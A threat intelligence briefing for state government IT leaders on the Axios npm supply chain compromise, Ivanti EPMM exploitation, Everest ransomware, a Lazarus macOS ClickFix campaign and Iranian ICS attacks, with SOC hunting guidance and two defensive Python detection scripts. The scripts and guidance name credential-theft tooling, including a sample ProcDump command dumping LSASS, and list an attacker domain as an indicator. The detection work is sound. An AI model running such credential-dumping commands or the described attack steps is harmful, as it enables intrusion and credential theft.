<p><strong>Threat Assessment Level: ELEVATED (Trending HIGH)</strong></p>
<p><em>Changed from MODERATE (April 20) to ELEVATED (April 21). Rationale: Simultaneous CISA supply chain alert, accelerating KEV additions (18 in 8 days), multi-actor exploitation of government mobile device management platforms, and a ransomware group posting six victims in a single day including major U.S. financial institutions.</em></p>
<h2><strong>Introduction</strong></h2>
<p>State government technology leaders face a compounding threat picture this week. On April 20, CISA issued a supply chain compromise alert for a JavaScript library embedded in thousands of web applications — including many serving constituents — while simultaneously adding eight new vulnerabilities to its Known Exploited Vulnerabilities catalog. At the same time, five separate threat actor campaigns are now exploiting Ivanti mobile device management software used across government agencies, deploying a previously unknown malware family called MISTBRICK. And the Everest ransomware group — which explicitly lists government-public-services among its targets — posted six new victims in a single day, including two major U.S. banks.</p>
<p>These are not isolated events. They represent a convergence: a single supply chain compromise is simultaneously a nation-state operation, a vulnerability management crisis, and a potential incident response scenario. State agencies that treat these as separate problems will miss the full picture.</p>
<p>This briefing provides the specific intelligence your teams need to act — today, this week, and this month.</p>
<h2><strong>What Changed</strong></h2>
<table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Event</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>April 21</strong></p> </td> <td> <p>Lazarus Group "Mach-O Man" macOS campaign detailed by ANY.RUN</p> </td> <td> <p>North Korean actors distributing macOS malware via fake Zoom/Teams/Meet invitations. Relevant to any executive or senior staff using Apple devices.</p> </td> </tr> <tr> <td> <p><strong>April 21</strong></p> </td> <td> <p>PUNK SPIDER / Akira ransomware actor profile updated</p> </td> <td> <p>Continued ransomware operational tempo against U.S. targets.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>CISA issues Axios npm supply chain compromise alert</p> </td> <td> <p>DPRK-nexus actors trojanized the widely-used Axios HTTP client library. Any state web application using Axios may be compromised.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>CISA adds 8 new CVEs to KEV catalog (18 KEVs in 8 days)</p> </td> <td> <p>Accelerating exploitation tempo. BOD 22-01 compliance timelines apply to all FCEB agencies; state agencies should mirror these timelines.</p> </td> </tr> <tr> <td> <p><strong>April 20</strong></p> </td> <td> <p>Everest ransomware posts 6 victims in one day (Citizens Bank, Frost Bank, others)</p> </td> <td> <p>Group explicitly targets government-public-services. 
Uses RMM tools commonly whitelisted in state environments.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Ivanti EPMM exploitation expands to 5 campaigns, MISTBRICK malware deployed</p> </td> <td> <p>CVE-2026-1281 and CVE-2026-1340 (both CVSS 9.8) now exploited by multiple unrelated threat actors against government targets across 6+ countries.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Iranian espionage campaign broadens to 17 countries</p> </td> <td> <p>MuddyWater (MOIS) custom backdoors and legitimate remote access tools targeting government, energy, utilities, education, and telecommunications.</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>CyberAv3ngers (IRGC-CEC) continues Rockwell PLC exploitation at U.S. water facilities</p> </td> <td> <p>Ongoing destructive Iranian ICS campaign against U.S. water and wastewater infrastructure. (Carried from prior cycle — remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>APT28 (Russia/GRU) Outlook CVE-2023-23397 credential harvesting campaign updated</p> </td> <td> <p>Russian intelligence service credential theft targeting government. (Carried from prior cycle — remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 19</strong></p> </td> <td> <p>Cisco Catalyst SD-WAN CVE-2026-20127 (CVSS 10.0) confirmed exploited against government</p> </td> <td> <p>Full network fabric takeover capability. (Carried from prior cycle — remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 17</strong></p> </td> <td> <p>BeyondTrust CVE-2026-1731 (CVSS 9.8) exploitation delivering Meterpreter into government environments</p> </td> <td> <p>Privileged access management compromise. 
(Carried from prior cycle — remains active.)</p> </td> </tr> <tr> <td> <p><strong>April 16</strong></p> </td> <td> <p>CISA adds Ivanti EPMM CVEs to KEV catalog</p> </td> <td> <p>Formal confirmation of active exploitation; BOD 22-01 remediation deadlines triggered.</p> </td> </tr> </tbody>
</table>
<h2><strong>Threat Timeline</strong></h2>
<table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Actor / Campaign</p> </th> <th> <p>Target Sector</p> </th> <th> <p>Key Detail</p> </th> </tr> </thead> <tbody> <tr> <td> <p>April 16</p> </td> <td> <p>Multiple actors</p> </td> <td> <p>Government, Commercial</p> </td> <td> <p>CISA adds Ivanti EPMM CVE-2026-1281 / CVE-2026-1340 to KEV catalog</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>Unknown</p> </td> <td> <p>Government</p> </td> <td> <p>BeyondTrust CVE-2026-1731 exploitation confirmed — Meterpreter payloads delivered</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>SafePay ransomware</p> </td> <td> <p>Multiple</p> </td> <td> <p>Actor profile updated — continued operations</p> </td> </tr> <tr> <td> <p>April 17</p> </td> <td> <p>DragonForce ransomware</p> </td> <td> <p>Multiple</p> </td> <td> <p>Actor profile updated — continued operations</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>Multiple (5 campaigns)</p> </td> <td> <p>Government, Financial, Transportation</p> </td> <td> <p>Ivanti EPMM exploitation expands; MISTBRICK malware deployed against government</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>MuddyWater (Iranian MOIS)</p> </td> <td> <p>Government, Energy, Utilities (17 countries)</p> </td> <td> <p>Custom backdoors + legitimate RAT abuse for espionage</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>APT28 (Russia/GRU)</p> </td> <td> <p>Government</p> </td> <td> <p>Outlook CVE-2023-23397 credential harvesting campaign updated</p> </td> </tr> <tr> <td> <p>April 19</p> </td> <td> <p>Sapphire Sleet (DPRK)</p> </td> <td> <p>Government, Healthcare, Energy, Aerospace (13 countries)</p> </td> <td> <p>Axios npm supply chain backdoor confirmed</p> </td> </tr> <tr> <td> <p>April 20</p> </td> <td> <p>CISA</p> </td> <td> <p>All sectors</p> </td> <td> <p>8 new KEVs added (18 total in 8 days) + Axios npm supply chain alert published</p> </td> </tr> <tr> <td> <p>April 20</p> </td> <td> <p>Everest ransomware</p> </td> <td> 
<p>Financial Services, Manufacturing</p> </td> <td> <p>6 victims posted in single day including Citizens Bank, Frost Bank</p> </td> </tr> <tr> <td> <p>April 21</p> </td> <td> <p>Lazarus Group (DPRK)</p> </td> <td> <p>Fintech, Crypto (expanding)</p> </td> <td> <p>"Mach-O Man" macOS ClickFix campaign via fake meeting invitations</p> </td> </tr> <tr> <td> <p>April 21</p> </td> <td> <p>CyberAv3ngers (Iranian IRGC-CEC)</p> </td> <td> <p>Water/Wastewater</p> </td> <td> <p>Ongoing Rockwell PLC exploitation at U.S. water facilities (carried from prior cycle)</p> </td> </tr> </tbody>
</table>
<h2><strong>Key Threat Analysis </strong></h2>
<h3><strong>1. Axios npm Supply Chain Compromise — DPRK Operation with Government in the Crosshairs</strong></h3>
<p>On April 20, CISA published a formal alert confirming that North Korean-nexus actors (tracked as Sapphire Sleet) trojanized the Axios HTTP client library — one of the most widely downloaded npm packages in the JavaScript ecosystem. The compromised package deployed a backdoor enabling persistent access and data exfiltration.</p>
<p>This is not a theoretical risk. Intelligence confirms two separate campaigns, one of them targeting government, healthcare, energy, and aerospace sectors across 13 countries and attributed to a DPRK state-sponsored, financially motivated actor. State government web applications — constituent portals, online tax filing, benefits enrollment, licensing systems — commonly use Axios for API calls. A compromised dependency in any of these applications could provide a persistent backdoor into state networks.</p>
<p><strong>The convergence problem:</strong> This single event simultaneously represents a supply chain compromise, a nation-state espionage operation, and a vulnerability management challenge. Agencies that route this to "the web team" without involving the SOC and CISO office will miss the full scope.</p>
<h3><strong>2. Ivanti EPMM: From Single Exploit to Multi-Actor Feeding Frenzy</strong></h3>
<p>What began as a pair of critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340, both CVSS 9.8) in Ivanti Endpoint Manager Mobile has escalated into a multi-actor exploitation campaign. Intelligence now tracks <strong>five separate campaigns</strong> exploiting these CVEs, with the newest deploying a previously unknown malware family called <strong>MISTBRICK</strong> specifically against government and commercial targets across six countries.</p>
<p>Both vulnerabilities enable unauthenticated remote code execution — meaning no credentials are required to compromise an exposed Ivanti EPMM instance. For state agencies using Ivanti for mobile device management (managing employee phones, tablets, and field devices), an unpatched instance is effectively an open door.</p>
<p>The progression is textbook: vulnerability disclosed → CISA adds to KEV → single actor exploits → multiple actors adopt → new malware families emerge. State agencies still running unpatched Ivanti EPMM are now facing not one threat actor, but at least five.</p>
<h3><strong>3. Everest Ransomware: Government-Adjacent Targeting at Scale</strong></h3>
<p>The Everest ransomware group posted six new victims on April 20 alone, including two major U.S. financial institutions (Citizens Bank and Frost Bank). Since 2021, Everest claims 350 total victims, with the United States as the primary target (93 victims). The group explicitly lists <strong>government-public-services</strong> among its target sectors.</p>
<p>What makes Everest particularly dangerous for state government environments is its tooling: the group simultaneously deploys <strong>AnyDesk, Atera, and Splashtop</strong> — three legitimate remote monitoring and management (RMM) tools that are commonly whitelisted in state IT environments for helpdesk and remote support purposes. This triple-RMM approach creates a significant detection blind spot: each tool individually appears legitimate, and security teams may not flag their presence.</p>
<p>Additional tools in Everest's arsenal include <strong>Cobalt Strike</strong> (BEACON), <strong>Metasploit/Meterpreter</strong>, <strong>SoftPerfect NetScan</strong> for network discovery, and <strong>ProcDump</strong> for credential dumping from LSASS memory.</p>
<p>The financial institution targeting is also relevant: state treasury and revenue agencies maintain banking relationships with institutions like those Everest has compromised. While no direct state government victim has been confirmed in the past 24 hours, the group's operational tempo and explicit government targeting make this a matter of when, not if.</p>
<h3><strong>4. Lazarus Group macOS Campaign: Executives Are the Target</strong></h3>
<p>A new Lazarus Group campaign distributes Go-based macOS malware ("Mach-O Man") through a social engineering technique called ClickFix. The attack chain: a victim receives a Telegram message from a compromised trusted contact → is directed to a fake Zoom, Teams, or Meet page → is prompted to paste a command into their terminal → a stager (teamsSDK.bin) downloads a fake application → the malware prompts for the user's password three times → harvests the macOS Keychain (stored passwords, certificates, tokens), browser sessions, and credentials → exfiltrates everything via Telegram.</p>
<p>While primary targets are currently fintech and cryptocurrency firms, the technique is sector-agnostic. Senior state government leaders — CIOs, CISOs, agency directors — increasingly use macOS devices and regularly join video meetings with external parties. The social engineering vector (a message from a compromised trusted contact with a meeting link) is exactly the kind of communication that bypasses suspicion.</p>
<p>This campaign also connects to earlier intelligence on <strong>BlueNoroff</strong> (a Lazarus sub-group) registering fresh command-and-control domains mimicking Zoom, Teams, and Meet platforms — infrastructure preparation that preceded this operational campaign.</p>
<h3><strong>5. Iranian Espionage: Broadening Scope Across Government and Critical Infrastructure</strong></h3>
<p>Two Iranian threat campaigns remain active and expanding:</p>
<ul> <li><strong>MuddyWater</strong> (Iranian Ministry of Intelligence and Security — MOIS) continues espionage operations using custom backdoors and legitimate remote access tools across <strong>17 countries</strong>, targeting government, energy, utilities, education, and telecommunications sectors.</li> <li><strong>CyberAv3ngers</strong> (Iranian Islamic Revolutionary Guard Corps — Cyber Electronic Command, IRGC-CEC) continues exploiting Rockwell PLCs at U.S. water and wastewater facilities.</li>
</ul>
<p>For state agencies operating water treatment, wastewater, and pipeline SCADA systems, the Iranian threat is not abstract — it is operational and confirmed against U.S. targets. Four new ICS advisories were published this cycle covering AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products.</p>
<h3><strong>6. Ongoing Critical Exploits (Carried from Prior Cycle)</strong></h3>
<p>Three critical exploitation campaigns from the prior cycle remain active and unresolved:</p>
<ul> <li><strong>Cisco Catalyst SD-WAN CVE-2026-20127 (CVSS 10.0):</strong> Confirmed active exploitation against government targets enabling full network fabric takeover. Any state agency using Cisco Catalyst SD-WAN must verify patch status immediately.</li> <li><strong>BeyondTrust CVE-2026-1731 (CVSS 9.8):</strong> Exploitation confirmed delivering Meterpreter payloads into government environments. State agencies using BeyondTrust for privileged access management face a particularly dangerous scenario: compromise of the PAM solution itself.</li> <li><strong>APT28 (Russia/GRU) Outlook CVE-2023-23397:</strong> Credential harvesting campaign updated as of April 19. Russian intelligence service actors continue targeting government entities via this well-documented NTLM credential theft vulnerability.</li>
</ul>
<h2><strong>Predictive Analysis: What Comes Next</strong></h2>
<table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Timeframe</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional threat actors adopt Ivanti EPMM exploitation; campaign count exceeds 5</p> </td> <td> <p><strong>HIGH (>75%)</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Pattern of rapid multi-actor adoption once CVEs hit KEV; 5 campaigns already confirmed</p> </td> </tr> <tr> <td> <p>Axios npm supply chain impact expands as organizations discover compromised dependencies</p> </td> <td> <p><strong>MODERATE-HIGH (50–75%)</strong></p> </td> <td> <p>7–14 days</p> </td> <td> <p>CISA alert will trigger audits; many organizations have not yet checked</p> </td> </tr> <tr> <td> <p>Everest ransomware posts government-sector victims</p> </td> <td> <p><strong>MODERATE-HIGH (50–75%)</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>6-victim day demonstrates sustained tempo; government explicitly in target set; 93 U.S. victims to date</p> </td> </tr> <tr> <td> <p>CISA issues dedicated Ivanti EPMM advisory (beyond KEV listing)</p> </td> <td> <p><strong>MODERATE (50–75%)</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Multi-actor exploitation of government targets typically triggers standalone advisory</p> </td> </tr> <tr> <td> <p>Lazarus ClickFix / Mach-O Man campaign expands beyond fintech to government executives</p> </td> <td> <p><strong>LOW-MODERATE (25–50%)</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>DPRK campaigns historically broaden targeting over time; technique is sector-agnostic</p> </td> </tr> <tr> <td> <p>PRC actors (Volt Typhoon / Salt Typhoon) surface with new pre-positioning activity against state infrastructure</p> </td> <td> <p><strong>LOW-MODERATE (25–50%)</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>No current intelligence (notable absence); these actors operate on long timelines with periodic bursts</p> </td> </tr> <tr> <td> <p>State agency compromised via Axios supply 
chain backdoor</p> </td> <td> <p><strong>LOW-MODERATE (25–50%)</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Depends on Axios adoption in state web applications; many citizen-facing portals use JavaScript frameworks with Axios dependencies</p> </td> </tr> </tbody>
</table>
<h2><strong>SOC Operational Guidance</strong></h2>
<h3><strong>Detection Priorities</strong></h3>
<p><strong>Priority 1 — Unauthorized RMM Tool Detection (Everest Ransomware)</strong></p>
<ul> <li><strong>ATT&CK:</strong> T1219 (Remote Access Software), T1486 (Data Encrypted for Impact)</li> <li><strong>Hunting hypothesis:</strong> Everest deploys AnyDesk, Atera, and Splashtop simultaneously. If your agency uses one of these legitimately, the other two should never appear. If none are authorized, any instance is suspicious.</li> <li><strong>Detection logic:</strong> Alert on execution of AnyDesk.exe, Atera*.exe, SplashtopStreamer.exe, or their service installations outside of approved IT support asset groups. Correlate with SoftPerfect NetScan execution (T1018) and ProcDump targeting LSASS (T1003.001) — these indicate active Everest operations.</li> <li><strong>Additional indicators:</strong> Cobalt Strike BEACON C2 traffic (T1071), Meterpreter sessions, and lateral movement via RMM tools to domain controllers.</li>
</ul>
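<p>The Priority 1 detection logic, as an added example that is not from the briefing or from any vendor: it runs the RMM-outside-approved-asset-group rule over constructed process-creation events and escalates a finding when SoftPerfect NetScan or a ProcDump against LSASS appears on the same host within a day. The asset-group names, the choice of a single authorized RMM product, the event shape, and the netscan.exe / procdump*.exe file names are assumptions.</p>

```python
"""Flag RMM tool execution outside policy and correlate it with the Everest
post-exploitation tooling the briefing names (NetScan, ProcDump on LSASS).

Added example for this briefing, not vendor or CISA code. Event shape, asset
groups and sample events are constructed; AnyDesk.exe, Atera*.exe and
SplashtopStreamer.exe come from the briefing, while netscan.exe (SoftPerfect
NetScan) and procdump*.exe are assumed from those tools' usual file names.
"""
from __future__ import annotations

import fnmatch
from collections import defaultdict
from datetime import datetime, timedelta

# Hosts in these asset groups may run the sanctioned RMM tool (assumption:
# your CMDB tags each host with an asset group).
APPROVED_SUPPORT_GROUPS = {"it-helpdesk", "desktop-support"}
# The one RMM product the agency authorizes (assumption). Per the briefing,
# if one is legitimate the other two should never appear anywhere.
AUTHORIZED_RMM = {"splashtop"}
# Case-insensitive image-name patterns -> RMM product family (T1219).
RMM_PATTERNS = {"anydesk.exe": "anydesk", "atera*.exe": "atera",
                "splashtopstreamer.exe": "splashtop"}
CORRELATION_WINDOW = timedelta(hours=24)


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rmm_family(image: str) -> str | None:
    """Return the RMM family an image belongs to, or None if it is not RMM."""
    name = _basename(image)
    for pattern, family in RMM_PATTERNS.items():
        if fnmatch.fnmatch(name, pattern):
            return family
    return None


def is_netscan(event: dict) -> bool:
    """SoftPerfect NetScan network discovery (T1018)."""
    return _basename(event["image"]) == "netscan.exe"


def is_lsass_dump(event: dict) -> bool:
    """ProcDump whose command line names lsass (T1003.001)."""
    return (_basename(event["image"]).startswith("procdump")
            and "lsass" in event["cmdline"].lower())


def evaluate(events: list[dict]) -> list[dict]:
    """One finding per (host, RMM family) seen outside policy: 'high' for the
    RMM tool alone, 'critical' if NetScan or an LSASS dump ran on the same
    host within CORRELATION_WINDOW (the briefing's 'active Everest' signal)."""
    by_host: dict[str, list[dict]] = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    findings, seen = [], set()
    for host, evs in by_host.items():
        for ev in evs:
            family = rmm_family(ev["image"])
            if family is None or (host, family) in seen:
                continue
            if family in AUTHORIZED_RMM and ev["asset_group"] in APPROVED_SUPPORT_GROUPS:
                continue  # sanctioned tool on a sanctioned host: no alert
            seen.add((host, family))
            reason = ("unauthorized RMM product" if family not in AUTHORIZED_RMM
                      else "approved RMM tool outside support asset group")
            window = [e for e in evs if abs(e["time"] - ev["time"]) <= CORRELATION_WINDOW]
            techniques = ["T1219"]
            if any(is_netscan(e) for e in window):
                techniques.append("T1018")
            if any(is_lsass_dump(e) for e in window):
                techniques.append("T1003.001")
            findings.append({"host": host, "rmm": family, "reason": reason,
                             "techniques": techniques,
                             "severity": "critical" if len(techniques) > 1 else "high"})
    return findings


def _ev(time: str, host: str, group: str, image: str, cmdline: str = "") -> dict:
    return {"time": datetime.fromisoformat(time), "host": host,
            "asset_group": group, "image": image, "cmdline": cmdline}


# Constructed sample events in simplified Sysmon event-1 style.
SAMPLE_EVENTS = [
    _ev("2026-04-20T09:02:00", "HELPDESK-07", "it-helpdesk",
        r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SplashtopStreamer.exe"),
    _ev("2026-04-20T10:15:00", "FIN-APP-02", "treasury-servers",
        r"C:\Users\Public\AnyDesk.exe", "AnyDesk.exe"),
    _ev("2026-04-20T10:41:00", "FIN-APP-02", "treasury-servers",
        r"C:\Users\Public\netscan.exe", "netscan.exe"),
    _ev("2026-04-20T11:03:00", "FIN-APP-02", "treasury-servers",
        r"C:\Windows\Temp\procdump64.exe", "procdump64.exe -ma lsass.exe lsass.dmp"),
    _ev("2026-04-20T13:20:00", "CLERK-114", "county-clerk",
        r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe", "AteraAgent.exe"),
]
```

Against the sample, the helpdesk host's Splashtop is silent, the county clerk's Atera agent is a high finding, and the treasury server's AnyDesk escalates to critical because NetScan and the LSASS dump follow it.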
<p><strong>Priority 2 — Ivanti EPMM Exploitation and MISTBRICK Post-Exploitation</strong></p>
<ul> <li><strong>ATT&CK:</strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1105 (Ingress Tool Transfer)</li> <li><strong>Hunting hypothesis:</strong> If your state uses Ivanti EPMM, check for unexpected outbound connections from the EPMM server, new scheduled tasks, or unfamiliar binaries in web-accessible directories. MISTBRICK is a new malware family — signatures may not yet exist in your EDR.</li> <li><strong>Detection logic:</strong> Monitor Ivanti EPMM server logs for unauthenticated API calls, unexpected file writes, and outbound connections to unfamiliar IPs. Alert on any new binary execution on the EPMM host that does not match the Ivanti software manifest.</li> <li><strong>Immediate action:</strong> If Ivanti EPMM is unpatched, assume compromise and initiate threat hunting on the host before patching.</li>
</ul>
<p><strong>Priority 3 — Axios npm Supply Chain Indicators</strong></p>
<ul> <li><strong>ATT&CK:</strong> T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1071.001 (Application Layer Protocol: Web Protocols)</li> <li><strong>Hunting hypothesis:</strong> Compromised Axios packages may beacon to attacker infrastructure. State web applications using Axios could be exfiltrating data without visible symptoms.</li> <li><strong>Detection logic:</strong> Block and alert on DNS queries or HTTP connections to sfrclak[.]com. Search web application dependency files (package-lock.json, yarn.lock) for references to this domain. Monitor for unexpected outbound data transfers from web application servers.</li> <li><strong>IOC to block:</strong> Domain sfrclak[.]com; SHA-1 3b8855190bfd44f2fc5f93c31f81646ce2c77f68</li>
</ul>
<p><strong>Priority 4 — macOS ClickFix / Lazarus Mach-O Man</strong></p>
<ul> <li><strong>ATT&CK:</strong> T1204.002 (User Execution: Malicious File), T1059.004 (Unix Shell), T1555.001 (Keychain), T1539 (Steal Web Session Cookie), T1036.005 (Masquerading)</li> <li><strong>Hunting hypothesis:</strong> Senior staff receiving meeting invitations via Telegram or unfamiliar channels may be targeted. The attack requires the user to paste a command into Terminal.</li> <li><strong>Detection logic:</strong> Monitor macOS endpoints for Terminal.app or iTerm2 executing curl or wget commands that download .bin or .app files. Alert on codesign --force --sign - commands (ad-hoc code signing of downloaded binaries). Monitor for Keychain access by non-standard processes. Watch for Telegram API connections from endpoints that don't have Telegram installed as an approved application.</li> <li><strong>Indicators to watch:</strong> Files named teamsSDK.bin; Cloudflare Workers domains (*.workers[.]dev) used as C2 proxies.</li>
</ul>
<p><strong>Priority 5 — Iranian Espionage via Legitimate Remote Access Tools</strong></p>
<ul> <li><strong>ATT&CK:</strong> T1133 (External Remote Services), T1078 (Valid Accounts), T1105 (Ingress Tool Transfer)</li> <li><strong>Hunting hypothesis:</strong> MuddyWater (MOIS) uses legitimate RATs to blend with normal administrative traffic. Look for remote access tool installations that were not provisioned by IT.</li> <li><strong>Detection logic:</strong> Baseline all authorized remote access tools. Alert on any new remote access software installation or execution that deviates from the baseline. Correlate with logins from unusual geographies or at unusual hours.</li>
</ul>
<h3><strong>Threat Hunting Queries to Prioritize This Week</strong></h3>
<ol> <li><strong>RMM tool audit:</strong> Enumerate all installations of AnyDesk, Atera, Splashtop, and similar RMM tools across the enterprise. Compare against the authorized software list. Investigate any unauthorized instances.</li> <li><strong>Ivanti EPMM host forensics:</strong> If Ivanti EPMM is deployed, conduct a forensic review of the host for indicators of exploitation — new files, modified configurations, unexpected network connections.</li> <li><strong>JavaScript dependency audit:</strong> Scan all state web application repositories for Axios package references. Identify version numbers and check against CISA's clean version guidance.</li> <li><strong>macOS Keychain access review:</strong> On managed macOS endpoints, review Keychain access logs for non-standard process access patterns.</li> <li><strong>Outbound connection anomaly detection:</strong> Review firewall and proxy logs for state web application servers making connections to unfamiliar domains, particularly sfrclak[.]com and *.workers[.]dev patterns.</li>
</ol>
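<p>The dependency audit called for in Priority 3 and in hunting query 3 above, as an added example that is not CISA's or the Axios project's code: it pulls every Axios entry out of a package-lock.json (lockfile versions 1, 2 and 3) or a yarn.lock v1 file, flags any entry resolved from the IOC domain, and marks the rest for verification against CISA's clean-version guidance. The sample lockfiles, their version strings and the empty clean-version set are constructed placeholders.</p>

```python
"""Audit npm lockfiles for Axios entries and for the Axios-compromise IOC
domain the briefing lists, so each entry can be pinned or blocked.

Added example for this briefing, not CISA or npm code. Handles package-lock.json
(lockfileVersion 1 'dependencies' tree and 2/3 'packages' map) and yarn.lock v1.
Sample lockfiles and version strings are constructed; CLEAN_VERSIONS is a
placeholder to populate from CISA's alert.
"""
import json
import re
from urllib.parse import urlparse

IOC_DOMAIN = "sfrclak.com"  # written sfrclak[.]com in the briefing
CLEAN_VERSIONS: set[str] = set()  # PLACEHOLDER: fill from CISA alert guidance


def _host_matches_ioc(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host == IOC_DOMAIN or host.endswith("." + IOC_DOMAIN)


def axios_entries_from_package_lock(text: str) -> list[dict]:
    """Collect {'version', 'resolved'} for every axios entry in package-lock.json."""
    data = json.loads(text)
    entries = []
    # lockfileVersion 2/3: flat map keyed by install path (nested copies included).
    for path, meta in data.get("packages", {}).items():
        if path.rsplit("node_modules/", 1)[-1] == "axios":
            entries.append({"version": meta.get("version"), "resolved": meta.get("resolved", "")})

    # lockfileVersion 1 (also kept in v2 for compatibility): nested tree.
    def walk(deps: dict) -> None:
        for name, meta in deps.items():
            if name == "axios":
                entries.append({"version": meta.get("version"), "resolved": meta.get("resolved", "")})
            walk(meta.get("dependencies", {}))

    walk(data.get("dependencies", {}))
    return entries


def axios_entries_from_yarn_lock(text: str) -> list[dict]:
    """Collect axios entries from yarn.lock v1 (block headers are unindented, end with ':')."""
    entries, current = [], None
    for line in text.splitlines():
        if line and not line.startswith((" ", "#")):
            # Header such as:  "axios@^1.6.0", "axios@~1.6.2":
            specs = [s.strip().strip('"') for s in line.rstrip(":").split(",")]
            current = None
            if any(s.startswith("axios@") for s in specs):
                current = {"version": None, "resolved": ""}
                entries.append(current)
        elif current is not None:
            m = re.match(r'\s+(version|resolved)\s+"([^"]*)"', line)
            if m:
                current[m.group(1)] = m.group(2)
    return entries


def audit_lockfile(text: str, clean_versions: set[str] = CLEAN_VERSIONS) -> list[dict]:
    """One finding per distinct axios entry, plus one if the IOC domain appears elsewhere."""
    parse = (axios_entries_from_package_lock if text.lstrip().startswith("{")
             else axios_entries_from_yarn_lock)
    findings, seen = [], set()
    for e in parse(text):
        key = (e["version"], e["resolved"])
        if key in seen:
            continue
        seen.add(key)
        ioc = _host_matches_ioc(e["resolved"])
        status = ("BLOCK: resolved from IOC domain" if ioc else
                  "clean" if e["version"] in clean_versions else
                  "VERIFY: check version against CISA clean-version guidance")
        findings.append({"version": e["version"], "resolved": e["resolved"],
                         "ioc_domain": ioc, "status": status})
    if IOC_DOMAIN in text and not any(f["ioc_domain"] for f in findings):
        findings.append({"version": None, "resolved": IOC_DOMAIN,
                         "ioc_domain": True, "status": "BLOCK: IOC domain referenced"})
    return findings


# Constructed sample lockfiles (version strings are deliberately fictitious).
SAMPLE_PACKAGE_LOCK = json.dumps({
    "name": "constituent-portal", "lockfileVersion": 3, "packages": {
        "node_modules/axios": {
            "version": "1.0.0-sample-a",
            "resolved": "https://registry.npmjs.org/axios/-/axios-1.0.0-sample-a.tgz"},
        "node_modules/legacy-widget/node_modules/axios": {
            "version": "1.0.0-sample-b",
            "resolved": "https://sfrclak.com/axios/-/axios-1.0.0-sample-b.tgz"},
    }})

SAMPLE_YARN_LOCK = """\
# yarn lockfile v1
"axios@^1.0.0-sample", "axios@~1.0.0-sample-a":
  version "1.0.0-sample-a"
  resolved "https://registry.yarnpkg.com/axios/-/axios-1.0.0-sample-a.tgz#0000"
axios-mock-adapter@^1.0.0:
  version "1.0.0"
"""
```

Run `audit_lockfile` over each lockfile in a repository checkout; a nested copy of Axios pulled in by another dependency is reported just like a direct one, which is the case a grep for the package name alone tends to miss.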
<h2><strong>Sector-Specific Defensive Priorities</strong></h2>
<h3><strong>Financial Services (State Treasury, Revenue, Comptroller)</strong></h3>
<p>Everest ransomware's April 20 targeting of Citizens Bank and Frost Bank is a direct signal. State treasury and revenue agencies handle billions in transactions and maintain banking relationships with institutions in Everest's crosshairs.</p>
<ul> <li><strong>Immediate:</strong> Verify that RMM tools (AnyDesk, Atera, Splashtop) are not installed on financial system endpoints unless explicitly authorized. Implement application whitelisting on systems processing financial transactions.</li> <li><strong>7-Day:</strong> Review third-party banking partner security posture. Confirm that financial transaction systems are segmented from general agency networks. Ensure wire transfer authorization requires out-of-band verification.</li> <li><strong>30-Day:</strong> Conduct tabletop exercise simulating ransomware encryption of financial systems during a peak processing period (e.g., tax season, payroll cycle).</li>
</ul>
<h3><strong>Energy and Critical Infrastructure (Water, Wastewater, Pipeline, Transportation)</strong></h3>
<p>Iranian threat actors — both MuddyWater/MOIS (espionage) and CyberAv3ngers/IRGC-CEC (destructive) — are actively targeting energy, utilities, and water systems. Four new ICS advisories cover products commonly deployed in state-operated facilities.</p>
<ul> <li><strong>Immediate:</strong> Verify network segmentation between IT and OT/SCADA environments. Confirm that Rockwell PLC firmware is current and that CyberAv3ngers mitigations from prior CISA advisories are in place.</li> <li><strong>7-Day:</strong> Review patch status for AVEVA Pipeline Simulation, Delta Electronics ASDA-Soft, Horner Cscape/XL PLC, and Anviz products against the new ICS advisories. Disable unnecessary remote access to ICS/SCADA systems.</li> <li><strong>30-Day:</strong> Commission an independent assessment of ICS/SCADA security posture across all state-operated water, wastewater, and transportation control systems. Evaluate whether current monitoring covers OT network traffic anomalies.</li>
</ul>
<h3><strong>Healthcare (Medicaid, Public Health, State Hospitals)</strong></h3>
<p>The Axios npm supply chain compromise explicitly targets healthcare among its 13-country victim set. State Medicaid portals, public health reporting systems, and hospital information systems frequently use JavaScript frameworks with Axios dependencies.</p>
